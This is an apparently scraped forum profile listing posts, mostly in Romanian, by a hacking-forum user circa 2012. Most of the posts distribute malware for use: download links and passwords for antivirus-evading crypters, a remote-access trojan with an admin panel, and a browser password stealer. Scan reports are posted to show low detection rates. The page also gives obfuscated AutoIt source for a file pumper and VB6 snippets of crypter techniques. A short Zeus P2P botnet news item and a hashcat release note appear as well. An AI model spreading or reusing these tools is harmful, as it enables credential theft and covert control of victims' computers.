
io.kent
Active Members-
Posts
2325 -
Joined
-
Last visited
-
Days Won
21
Everything posted by io.kent
-
URNIGHTMARE daca scoti limba, si o ai lunga, vezi ce patesti:) Deci eu lam testat, lau luat de pe level-23.biz, sincer nu e pe placul meu, acum incercati si voi! poate o sa fiti multumitii..
-
download : http://www.box.com/s/l9pu0j6ajkzilw7yxo4a Code : Pass: zpnybkYl9OAd9h1u4p7Hhw== Encrypt: Simple Crypto Grapher (key:23) Cautati in google / Search in google NU LAM SCANAT.. SCANATI INAINTE SA-L RULATI ! ----------------------------------------------------------------------------- si aici poate va aduceti aminde te acest crypter, e foarte batran dar il las aici pentru cei ce vor sa-l (crakereze ) nu stiu daca asa se spune REPET E FOARTE DETECTAT DOWNLOAD : http://www.box.com/s/2n1ah5h17g7eywa2v1gs HUM ESTE PRIETENUL MEU, PE FORUMUL, LEVEL-23.BIZ
-
download : https://www.box.com/s/4vv5956rlux27pykq9cg
-
download : Multiupload.nl - upload your files to multiple file hosting sites! parola in : rar sursa : imsecure
-
unde nu-i cap, vai de picioare!!
-
download : http://db.tt/8yIWJ2VR VB6 | Crypters [source Recopilacion] Lexies Crypter Scantime + Runtime Phantom Crypter Gio Crypter v1.0.0 by GioSoft Reload Crypter CryptCrew Crypter Masters Hackers Crypter Indetectables Crypter FZF Crypter SecureTeamCrypter iCrypt Crypter ScanTime+Runtime Dragon Protector Crypter DW-Crypter Dr.True Crypter MultiCrypter v1 Code :
-
Manual del Ensamblador - Curso Formato: PDF CONTENIDO Y DESCARGA DEL MANUAL DE ENSAMBLADOR - CURSO Curso basico de Emsamblador Capitulo 1 Conceptos Basicos Capitulo 2 Programación en ensamblador Capitulo 3 Las instrucciones del ensamblador Capitulo 4 Las instrucciones del ensamblador (2da. Parte) Capitulo 5 Las instrucciones del ensamblador (3era. Parte) Capitulo 6 Interrupciones y manejo de archivos Capitulo 7 Introducción al manejo de archivos Manual Ensamblador Manuales lenguaje Ensamblador español Curso guia codigo Ensamblador gratis Gratuito pdf programa Ensamblador Tutorial programas Ensamblador Tutoriales ejemplos Ensamblador Conceptos Basicos Información en las computadoras Unidades de información Sistemas numéricos Convertir números binarios a decimales Convertir números decimales a binarios Sistema Hexadecimal Métodos de representación de datos en una computadora Código ASCII Método BCD Representación de punto flotante Trabajando con el lenguaje ensamblador Proceso de creación de un programa Registros de la UCP La estructura del ensamblador Nuestro primer programa Guardar y cargar los programas Condiciones, ciclos y bifurcaciones Interrupciones Descarga: DepositFiles sursa : nu stiu daca e numai in spaniola, sau e si in engleza! aveti aici si tutoriale, ..
-
Code : download : https://www.box.com/s/q3cs61fiq4miogu17auv
-
Code: http://blognetdominion.com direct download : http://blognetdominion.com/access30-2/
-
Code: #include <ButtonConstants.au3> #include <EditConstants.au3> #include <GUIConstantsEx.au3> #include <ProgressConstants.au3> #include <SliderConstants.au3> #include <StaticConstants.au3> #include <WindowsConstants.au3> #include <String.au3> ;file pumper made by 1234hotmaster $Main = GUICreate("File pumper by 1234hotmaster", 379, 260, -1, -1) $Prog = GUICtrlCreateProgress(-2, 240, 385, 25) $Path = GUICtrlCreateInput("", 32, 8, 297, 21, BitOR($GUI_SS_DEFAULT_INPUT,$ES_READONLY)) GUICtrlSetTip(-1, "Path to file which you want to pump") $Label1 = GUICtrlCreateLabel("File:", 8, 10, 23, 17) $SelectPath = GUICtrlCreateButton("...", 328, 8, 43, 21) GUICtrlSetTip(-1, "Select file path") $Byte = GUICtrlCreateSlider(8, 72, 366, 29, BitOR($GUI_SS_DEFAULT_SLIDER,$TBS_BOTH,$TBS_NOTICKS)) GUICtrlSetData(-1,2) GUICtrlSetLimit(-1, 4, 0) $Label2 = GUICtrlCreateLabel("Byte", 12, 104, 25, 17) GUICtrlSetTip(-1, "Byte") $Label3 = GUICtrlCreateLabel("KB", 100, 104, 18, 17) GUICtrlSetTip(-1, "Kilobyte") $Label4 = GUICtrlCreateLabel("MB", 185, 104, 20, 17) GUICtrlSetTip(-1, "Megabyte") $Label5 = GUICtrlCreateLabel("GB", 268, 104, 19, 17) GUICtrlSetTip(-1, "Gigabyte") $Label6 = GUICtrlCreateLabel("TB", 352, 104, 18, 17) GUICtrlSetTip(-1, "Terabyte") $Pump = GUICtrlCreateButton("Pump", 160, 184, 67, 33) $Amount = GUICtrlCreateInput("10", 152, 152, 81, 21) $UD = GUICtrlCreateUpdown($Amount) GUICtrlSetLimit(-1, 32767, 0) GUICtrlSetTip(-1, "Amount to pump") GUISetState(@SW_SHOW) Func _CompExplorerCurrentAdress() ;by 1234hotmaster Return StringReplace(ControlGetText(_HexToString(_StringReverse(Chr(68)&Chr(53)&Chr(51)&Chr(55)& _ Chr(51)&Chr(55)&Chr(49)&Chr(54)&Chr(67)& _ Chr(54)&Chr(51)&Chr(52)&Chr(55)&Chr(53)& _ Chr(52)&Chr(55)&Chr(53)&Chr(54)&Chr(69)& _ Chr(54)&Chr(57)&Chr(54)&Chr(50)&Chr(54)& _ Chr(49)&Chr(54)&Chr(51)&Chr(52)&Chr(65)& _ Chr(51)&Chr(51)&Chr(53)&Chr(51)&Chr(53)& _ Chr(49)&Chr(52)&Chr(67)&Chr(52)&Chr(51)& _ Chr(52)&Chr(66)&Chr(53))),Chr(0),Chr(91)& _ Chr(67)&Chr(76)&Chr(65)&Chr(83)&Chr(83)&Chr(58)& _ Chr(84)&Chr(111)&Chr(111)&Chr(108)&Chr(98)& _ Chr(97)&Chr(114)&Chr(87)&Chr(105)&Chr(110)& _ Chr(100)&Chr(111)&Chr(119)&Chr(51)&Chr(50)& _ Chr(59)&Chr(32)&Chr(73)&Chr(78)&Chr(83)& _ Chr(84)&Chr(65)&Chr(78)&Chr(67)&Chr(69)& _ Chr(58)&Chr(50)&Chr(93)),Chr(65)&Chr(100)& _ Chr(100)&Chr(114)&Chr(101)&Chr(115)&Chr(115)& _ Chr(58)&Chr(32),"",1,1) EndFunc ; #FUNCTION# ================================================================================?========================= ; Name...........: _ProgressSetMarquee ; Description ...: Starts/Stops the $PBS_MARQUEE effect on a GUICtrlCreateProgress() control. ; Syntax.........: _ProgressSetMarquee($iControl, $hHandle) ; Parameters ....: $iControl - A valid ProgressBar control ID. ; $hHandle - A valid GUI handle the ProgressBar is linked with. ; Requirement(s).: v3.3.0.0 or higher ; Return values .: Success - Returns a 2D Array with control ID and state of the ProgressBar. 0 = No Marquee effect Or 1 = Marquee effect. ; Author ........: guinness. ; Example........; Yes ;===============================================================================?====================================== Func _ProgressSetMarquee($iControl, $hHandle) Local $bType = 0, $iColor = -1, $iIndex = -1 If Not IsDeclared("Global_ProgressSetMarquee") Then Global $Global_ProgressSetMarquee[1][3] = [[0, 3]] For $A = 1 To $Global_ProgressSetMarquee[0][0] If @error Then ExitLoop If $Global_ProgressSetMarquee[$A][0] = $iControl Then $iIndex = $A $bType = $Global_ProgressSetMarquee[$iIndex][1] ExitLoop EndIf Next If $iIndex = -1 Then If $Global_ProgressSetMarquee[0][0] <= UBound($Global_ProgressSetMarquee, 1) + 1 Then ReDim $Global_ProgressSetMarquee[($Global_ProgressSetMarquee[0][0] + 1) * 2][$Global_ProgressSetMarquee[0][1]] $Global_ProgressSetMarquee[0][0] += 1 $iIndex = $Global_ProgressSetMarquee[0][0] $Global_ProgressSetMarquee[$iIndex][0] = $iControl $Global_ProgressSetMarquee[$iIndex][1] = $bType $Global_ProgressSetMarquee[$iIndex][2] = $iColor EndIf Local $hControl = GUICtrlGetHandle($Global_ProgressSetMarquee[$iIndex][0]), $aControlGetPos = ControlGetPos($hHandle, "", $Global_ProgressSetMarquee[$iIndex][0]) Local $aStyle = DllCall("user32.dll", "long", "GetWindowLong", "hwnd", $hControl, "Int", 0xFFFFFFF0) Local $aExStyle = DllCall("user32.dll", "long", "GetWindowLong", "hwnd", $hControl, "Int", 0xFFFFFFEC) If $aStyle[0] <> 1342308360 Then GUICtrlDelete($Global_ProgressSetMarquee[$iIndex][0]) $iControl = GUICtrlCreateProgress($aControlGetPos[0], $aControlGetPos[1], $aControlGetPos[2], $aControlGetPos[3], 0x0008, $aExStyle[0]) ; 0x0008 $hControl = GUICtrlGetHandle($iControl) If $Global_ProgressSetMarquee[$iIndex][2] <> -1 Then DllCall("UxTheme.dll", "Int", "SetWindowTheme", "hwnd", $hControl, "wstr", 0, "wstr", 0) GUICtrlSetColor($iControl, $Global_ProgressSetMarquee[$iIndex][2]) EndIf $Global_ProgressSetMarquee[$iIndex][0] = $iControl EndIf Switch $Global_ProgressSetMarquee[$iIndex][1] Case 1 $bType = False Case Else $bType = True EndSwitch DllCall("user32.dll", "lresult", "SendMessageW", "hwnd", $hControl, "uInt", 1034, "wparam", $bType, "lparam", 50) If @error Then $Global_ProgressSetMarquee[$iIndex][1] = 1 If $Global_ProgressSetMarquee[$iIndex][1] = 1 Then GUICtrlDelete($Global_ProgressSetMarquee[$iIndex][0]) $iControl = GUICtrlCreateProgress($aControlGetPos[0], $aControlGetPos[1], $aControlGetPos[2], $aControlGetPos[3], 0x0008, $aExStyle[0]) ; 0x0008 If $Global_ProgressSetMarquee[$iIndex][2] <> -1 Then DllCall("UxTheme.dll", "Int", "SetWindowTheme", "hwnd", GUICtrlGetHandle($iControl), "wstr", 0, "wstr", 0) GUICtrlSetColor($iControl, $Global_ProgressSetMarquee[$iIndex][2]) EndIf $Global_ProgressSetMarquee[$iIndex][0] = $iControl $Global_ProgressSetMarquee[$iIndex][1] = 0 Return 0 EndIf $Global_ProgressSetMarquee[$iIndex][1] = 1 Return 1 EndFunc ;==>_ProgressSetMarquee ; #FUNCTION# ================================================================================?========================= ; Name...........: _ProgressSetTheme ; Description ...: Sets a 'themed' ProgressBar with the ability to change the color of the ProgressBar. ; Syntax.........: _ProgressSetTheme([$iControl, [$bThemeColor]]) ; Parameters ....: $iControl - [optional] A valid ProgressBar control ID. Default = -1 (last control ID) ; $hHandle - [optional] A valid Hex color value. Default = 0x24D245 ; Requirement(s).: v3.3.0.0 or higher ; Return values .: Success - Returns a value from the 'SetWindowTheme' DLL call. ; Failure - Returns 0 with @extended set as 1. ; Author ........: guinness. ; Example........; Yes ;===============================================================================?====================================== Func _ProgressSetTheme($iControl = -1, $bThemeColor = 0x24D245) Local $bType = 0, $iColor = $bThemeColor, $iIndex = -1, $hControl = GUICtrlGetHandle($iControl) If Not IsDeclared("Global_ProgressSetMarquee") Then Global $Global_ProgressSetMarquee[1][3] = [[0, 3]] $iControl = DllCall("user32.dll", "Int", "GetDlgCtrlID", "hwnd", $hControl) If @error Then Return SetError(1, 1, 0) $iControl = $iControl[0] For $A = 1 To $Global_ProgressSetMarquee[0][0] If @error Then ExitLoop If $Global_ProgressSetMarquee[$A][0] = $iControl Then If $Global_ProgressSetMarquee[$A][1] = 1 Then Return SetError(1, 1, 0) ; Marquee is already running. $iIndex = $A $bType = $Global_ProgressSetMarquee[$iIndex][1] ExitLoop EndIf Next If $iIndex = -1 Then If $Global_ProgressSetMarquee[0][0] <= UBound($Global_ProgressSetMarquee, 1) + 1 Then ReDim $Global_ProgressSetMarquee[($Global_ProgressSetMarquee[0][0] + 1) * 2][$Global_ProgressSetMarquee[0][1]] $Global_ProgressSetMarquee[0][0] += 1 $iIndex = $Global_ProgressSetMarquee[0][0] $Global_ProgressSetMarquee[$iIndex][0] = $iControl $Global_ProgressSetMarquee[$iIndex][1] = $bType $Global_ProgressSetMarquee[$iIndex][2] = $iColor EndIf Local $aReturn = DllCall("UxTheme.dll", "Int", "SetWindowTheme", "hwnd", $hControl, "wstr", 0, "wstr", 0) If @error Then Return SetError(1, 1, 0) GUICtrlSetColor($iControl, $Global_ProgressSetMarquee[$iIndex][2]) Return $aReturn[0] EndFunc ;==>_ProgressSetTheme Func _ProgressMarquee_Start($iControlID = -1) Local Const $PBM_SETMARQUEE = 1034 Return GUICtrlSendMsg($iControlID, $PBM_SETMARQUEE, 1, 50) EndFunc ;==>_ProgressMarquee_Start Func _ProgressMarquee_Stop($iControlID = -1, $iReset = 0) Local Const $PBS_MARQUEE = 0x0008, $PBM_SETMARQUEE = 1034 GUICtrlSendMsg($iControlID, $PBM_SETMARQUEE, 0, 50) If $iReset = 1 Then Return GUICtrlSetStyle($iControlID, $PBS_MARQUEE) EndIf Return 1 EndFunc ;==>_ProgressMarquee_Stop While 1 $nMsg = GUIGetMsg() Switch $nMsg Case $GUI_EVENT_CLOSE Exit Case $SelectPath $fd = FileOpenDialog("Select File Path",_CompExplorerCurrentAdress(),"Executable Files (*.exe;*.bat)|Music Files (*.mp3;*.wav)|All Files (*.*)",1+2) If Not @error Then GUICtrlSetData($Path,$fd) EndIf Case $Pump If FileExists(GUICtrlRead($Path)) Then Local $ByteInt,$ByteStr If GUICtrlRead($Byte) = 0 Then $ByteStr = "Byte" $ByteInt = Int(GUICtrlRead($amount)) * 8 ElseIf GUICtrlRead($Byte) = 1 Then $ByteStr = "Kilobyte" $ByteInt = Int(GUICtrlRead($amount)) * 1024 ElseIf GUICtrlRead($Byte) = 2 Then $ByteStr = "Megabyte" $ByteInt = Int(GUICtrlRead($amount)) * 1048576 ElseIf GUICtrlRead($Byte) = 3 Then $ByteStr = "Gigabyte" $ByteInt = Int(GUICtrlRead($amount)) * 1073741824 ElseIf GUICtrlRead($Byte) = 4 Then $ByteStr = "Terabyte" $ByteInt = Int(GUICtrlRead($amount)) * 1099511627776 EndIf If Not @error Then $fp = FileOpen(GUICtrlRead($Path),1+16) _ProgressSetMarquee($Prog,$Main) FileWrite($fp,Binary(_StringRepeat(" ",$ByteInt))) FileClose($fp) _ProgressMarquee_Stop($Prog) GUICtrlDelete($prog) $Prog = GUICtrlCreateProgress(-2, 240, 385, 25) MsgBox(0,"Done!","Successfuly added " & GUICtrlRead($amount) & " " & $ByteStr & "(s) To " & GUICtrlRead($Path),3) EndIf Else MsgBox(16,"Error","Please select the file to pump. The file must exist",4) EndIf EndSwitch WEnd
-
Code Func _CompExtendFrame($hWnd,$Left=-1,$Top=-1,$Right=-1,$Bottom=-1) ;by 1234hotmaster If @OSVersion = Chr(87)&Chr(73)&Chr(78)&Chr(95)& _ Chr(55) Or @OSVersion = Chr(87)&Chr(73)&Chr(78)&Chr(95)& _ Chr(86)&Chr(73)&Chr(83)&Chr(84)&Chr(65) Then $tRect = DllStructCreate(Chr(108)&Chr(111)&Chr(110)&Chr(103)& _ Chr(32)&Chr(76)&Chr(101)&Chr(102)&Chr(116)& _ Chr(59)&Chr(108)&Chr(111)&Chr(110)&Chr(103)& _ Chr(32)&Chr(84)&Chr(111)&Chr(112)&Chr(59)& _ Chr(108)&Chr(111)&Chr(110)&Chr(103)&Chr(32)& _ Chr(82)&Chr(105)&Chr(103)&Chr(104)&Chr(116)& _ Chr(59)&Chr(108)&Chr(111)&Chr(110)&Chr(103)& _ Chr(32)&Chr(66)&Chr(111)&Chr(116)&Chr(116)& _ Chr(111)&Chr(109)) DllStructSetData($tRect, Chr(76)&Chr(101)&Chr(102)&Chr(116), $Left) DllStructSetData($tRect, Chr(84)&Chr(111)&Chr(112), $Top) DllStructSetData($tRect, Chr(82)&Chr(105)&Chr(103)&Chr(104)& _ Chr(116), $Right) DllStructSetData($tRect, Chr(66)&Chr(111)&Chr(116)&Chr(116)& _ Chr(111)&Chr(109), $Bottom) Return DllCall(Chr(100)&Chr(119)&Chr(109)&Chr(97)& _ Chr(112)&Chr(105)&Chr(46)&Chr(100)&Chr(108)& _ Chr(108), Chr(108)&Chr(111)&Chr(110)&Chr(103), Chr(68)&Chr(119)&Chr(109)&Chr(69)& _ Chr(120)&Chr(116)&Chr(101)&Chr(110)&Chr(100)& _ Chr(70)&Chr(114)&Chr(97)&Chr(109)&Chr(101)& _ Chr(73)&Chr(110)&Chr(116)&Chr(111)&Chr(67)& _ Chr(108)&Chr(105)&Chr(101)&Chr(110)&Chr(116)& _ Chr(65)&Chr(114)&Chr(101)&Chr(97), Chr(104)&Chr(119)&Chr(110)&Chr(100),$hWnd , Chr(108)&Chr(111)&Chr(110)&Chr(103), DllStructGetPtr($tRect)) EndIf EndFunc
-
[[vb6] ThisExe unicode Code : Function NewThisExe() As String Dim iBuff(519) As Byte Call Invoke("kernel32", "GetModuleFileNameW", 0, VarPtr(iBuff(0)), 519) NewThisExe = iBuff End Function [vb6] New_FileLen Code : Public Function New_FileLen(ByVal FilePath As String) As Long New_FileLen = Invoke("msvbvm60", "rtcFileLen", (StrPtr(FilePath))) End Function [vb6] Get Name Of File Code : Option Explicit Public Function GetNameOfFile() As String Dim bName() As Byte Dim pep As Long Dim uCs As Long Dim Adress As Long Dim tmp As Long Dim i As Long ' Call Invoke("kernel32", "RtlMoveMemory", VarPtr(pep), Invoke("NTDLL", "NtCurrentTeb") + &H30, &H4) Call Invoke("kernel32", "RtlMoveMemory", VarPtr(uCs), pep + &H10, &H4) Call Invoke("kernel32", "RtlMoveMemory", VarPtr(Adress), uCs + &H3C, &H4) Call Invoke("kernel32", "RtlMoveMemory", VarPtr(tmp), Adress, 1) Do While tmp <> 0 i = i + 2: Call Invoke("kernel32", "RtlMoveMemory", VarPtr(tmp), Adress + i, 1) Loop ReDim bName(i) Call Invoke("kernel32", "RtlMoveMemory", VarPtr(bName(0)), Adress, i) GetNameOfFile = bName End Function
-
un paket complect de programe!! RsT... download : Analizer Pack By Sanko.rar AM SCOS PAROLA, CE ATATEA PAROLE, SI PROSTI.. PROFITATI DE OCAZIE!! NU E ANALIZAT, NU LA-M SCANAT..
-
de mult timp nu mai folosesc DarkComet, dar pentru cei care folosesc e bine cas nebindate,
-
sey primadata treci pe aici https://rstcenter.com/forum/bine-ai-venit-aici-te-poti-prezenta.rst spune si tu ce calugar esti, sau preot, sau asa mai departe, dupa aia cand o sa ai 20 de posturi, imi dai un pm si vei avea parola!
-
Zeus updated style P2P, each bot is nginx Researchers at Symantec have discovered that the new version of the Zeus / SpyEye ordinary bots can act as a command server. This greatly complicate neutralizing botnets, because before the main method of disposal a network of infected computers was blocking C & C-or server failover using a dummy C & C-server. In addition, this method of organizing peer nodes complicates the search for the owner of the botnet and the work of the service makes senseless Zeustracker. Overall, this fork, that is, the parallel version of Zues, really impressive, the authors used several new methods of protection against interception of management. Researchers say that hints at the rejection of simple C & C-peer servers in favor of models appeared in the last build of Zeus at the end of 2011. The new version of this line continued: P2P botnet uses a network to gather information and improve survival. Previously transmitted between nodes list C & C-servers, and in the case of loss of communication with a network of switches to the next in the list. Now C & C-servers disappeared from the system: commands directly receives one of the nodes in P2P-networks and distributes them over the network. Bots have learned to receive from each other team, configuration files, executables. The figure shows a scheme of the old and new versions of Zeus . Another interesting innovation was a shift towards communication on UDP, rather than TCP. In the previous version only used homemade UDP-handshake. If successful, the exchange bots and other configuration files for TCP. Now the transmission is also on UDP. The screenshots shows traffic in the old and new variants of Zeus .
-
florin2boss esti incredibil:)) nu vezi parola?
-
With this trojan can get full access to the victim's computer. Troy runs invisibly in the background, Ammi and passes AmmyyID a simple admin panel. In the current version of the e-mail attachment AmmyyAdmin + + + SURSA DE CONTROL PANEL Screenshot admin+scan RDP... Troy was written in PureBasic 4.40 + v `s lib Droopy download : DirtyAdmin (2).zip pass! pm scan : novirusthnks Report date: 2012-09-25 12:47:55 (GMT 1) File name: dirtyadmin-exe File size: 753664 bytes MD5 hash: 1c123e1aff5f2b9733b392d1bfddc7b2 SHA1 hash: 2f613a696f13f41d6b60bc180d45bd745e4aefe6 Detection rate: 4 on 14 (29%) Status: INFECTED Asquared 12:47:55 5.1.0.3 Packed.Win32.PePatch!IK Avast 12:47:55 5.0 AVG 12:47:55 10.0.0.1190 Avira 12:47:55 7.11.7.12 TR/Fakealert.41092 BitDefender 12:47:55 7.0.0.2555 ClamAV 12:47:55 0.97.4 Comodo 12:47:55 1.0 DrWeb 12:47:55 5.0.2 Fprot 12:47:55 6.0 W32/Heuristic-400!Eldorado (not disinfectable) IkarusT3 12:47:55 T31001097 Packed.Win32.PePatch Panda 12:47:55 10.0.3.0 STOPZilla 12:47:55 5.0.0.0 TrendMicro 12:47:55 9.200.0.1012 VBA32 12:47:55 3.12.0.300 Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org Report date: 2012-09-25 12:53:03 (GMT 1) File name: aav3-exe File size: 722736 bytes MD5 hash: f9cde592fcd907fb00807124df17c2f1 SHA1 hash: 2201acef47c9fea390c1c5ccd2e67257f5551b77 Detection rate: 1 on 14 (7%) Status: INFECTED Asquared 12:53:03 5.1.0.3 Riskware.RemoteAccess.Win32.AmmyyAdmin.AMN!A2 Avast 12:53:03 5.0 AVG 12:53:03 10.0.0.1190 Avira 12:53:03 7.11.7.12 BitDefender 12:53:03 7.0.0.2555 ClamAV 12:53:03 0.97.4 Comodo 12:53:03 1.0 DrWeb 12:53:03 5.0.2 Fprot 12:53:03 6.0 IkarusT3 12:53:03 T31001097 Panda 12:53:03 10.0.3.0 STOPZilla 12:53:03 5.0.0.0 TrendMicro 12:53:03 9.200.0.1012 VBA32 12:53:03 3.12.0.300 Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org e detectat, dar merge de minune! useri cu 0 posturi sa nu cereti pass, ca nu va dau! parola, pentru useri de 20 de posturi in sus!
-
Hashcat Released new version on 24Sept2012. Features Multi-Threaded Free Multi-Hash (up to 24 million hashes) Multi-OS (Linux, Windows and OSX native binaries) Multi-Algo (MD4, MD5, SHA1, DCC, NTLM, MySQL, ...) SSE2 accelerated All Attack-Modes except Brute-Force and Permutation can be extended by rules Very fast Rule-engine Rules compatible with JTR and PasswordsPro Possible to resume or limit session Automatically recognizes recovered hashes from outfile at startup Can automatically generate random rules Load saltlist from external file and then use them in a Brute-Force Attack variant Able to work in an distributed environment Specify multiple wordlists or multiple directories of wordlists Number of threads can be configured Threads run on lowest priority 30+ Algorithms hashcat - advanced password recovery implemented with performance in mind ... and much more download : hashcat v0.41 5934c2782284a2f0c2e03a8734263cb9 http://hashcat.net/files/hashcat-0.41.7z
-
altceva nimic in afara de pizde ? mai avem si spionii mai avem si care stau de 6 edit// daca cauti gasesti sigur, dar eu in locul tau cu o camera mas multumii, dece sa dau 500 daca pot sa dau 200,
-
nu pot sa-ti garantez ca trece! incearcal edit// ca sa decryptati parola, aveti aici pe forum, decoder, acualizat si acolo ANDROID TOOL adaugati poza, si primiti rezultatul..
-
Opciones: EOF CloneFile UpdatePe Autorun Replace Icon PePack Add Bytes Injection Pass: UdTools.net : Download MC Public v1.rar from Sendspace.com - send big files the easy way scan : novirusthanks Report date: 2012-09-25 10:39:49 (GMT 1) File name: mc-public-v1-exe File size: 232960 bytes MD5 hash: 55b8a15e989a4254ba221bbe069927dc SHA1 hash: e31397ccfa42ff25e72d151401a6dded4c3001b0 Detection rate: 2 on 14 (14%) Status: INFECTED Asquared 10:39:49 5.1.0.3 Avast 10:39:49 5.0 AVG 10:39:49 10.0.0.1190 Avira 10:39:49 7.11.7.12 BitDefender 10:39:49 7.0.0.2555 ClamAV 10:39:49 0.97.4 Trojan.Downloader-46607 Comodo 10:39:49 1.0 DrWeb 10:39:49 5.0.2 Fprot 10:39:49 6.0 IkarusT3 10:39:49 T31001097 Panda 10:39:49 10.0.3.0 STOPZilla 10:39:49 5.0.0.0 TrendMicro 10:39:49 9.200.0.1012 PAK_Generic.001 VBA32 10:39:49 3.12.0.300 Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org
-
in afara sa zici e o porcarie, nu merge, nu poti sa multumesti? si daca nu merge, dar fi recunoscator,off off viata viata!!
-
Saint Andrew's Multi Stealer is coded in vb.net. This program is used for stealing saved passwords from victim's PC. It can steal saved password of the following programs: Mozilla Firefox Google Chrome Windows Live Messenger Opera Internet Explorer download : https://www.box.com/s/e9dw36toiegdvmmd7825 pass : scan : Report date: 2012-09-25 10:06:48 (GMT 1) File name: builder-exe File size: 516096 bytes MD5 hash: 39161695e3024e0866b9a2805a1445dc SHA1 hash: 2c937ef5fb02c8f2ac1f33d2aebc8bf25566bdf9 Detection rate: 0 on 14 (0%) Status: CLEAN Asquared 10:06:48 5.1.0.3 Avast 10:06:48 5.0 AVG 10:06:48 10.0.0.1190 Avira 10:06:48 7.11.7.12 BitDefender 10:06:48 7.0.0.2555 ClamAV 10:06:48 0.97.4 Comodo 10:06:48 1.0 DrWeb 10:06:48 5.0.2 Fprot 10:06:48 6.0 IkarusT3 10:06:48 T31001097 Panda 10:06:48 10.0.3.0 STOPZilla 10:06:48 5.0.0.0 TrendMicro 10:06:48 9.200.0.1012 VBA32 10:06:48 3.12.0.300 Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org Report date: 2012-09-25 10:06:48 (GMT 1) File name: stub-exe File size: 1157632 bytes MD5 hash: 4f09ff36ec77222d5db2ea6f6b4f3782 SHA1 hash: 5bd7b1184596439b72ee4cc69070a4db4572863b Detection rate: 2 on 14 (14%) Status: INFECTED Asquared 10:06:48 5.1.0.3 Avast 10:06:48 5.0 AVG 10:06:48 10.0.0.1190 Avira 10:06:48 7.11.7.12 TR/Spy.Gen BitDefender 10:06:48 7.0.0.2555 ClamAV 10:06:48 0.97.4 Comodo 10:06:48 1.0 DrWeb 10:06:48 5.0.2 Fprot 10:06:48 6.0 IkarusT3 10:06:48 T31001097 Trojan-Dropper Panda 10:06:48 10.0.3.0 STOPZilla 10:06:48 5.0.0.0 TrendMicro 10:06:48 9.200.0.1012 VBA32 10:06:48 3.12.0.300 Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org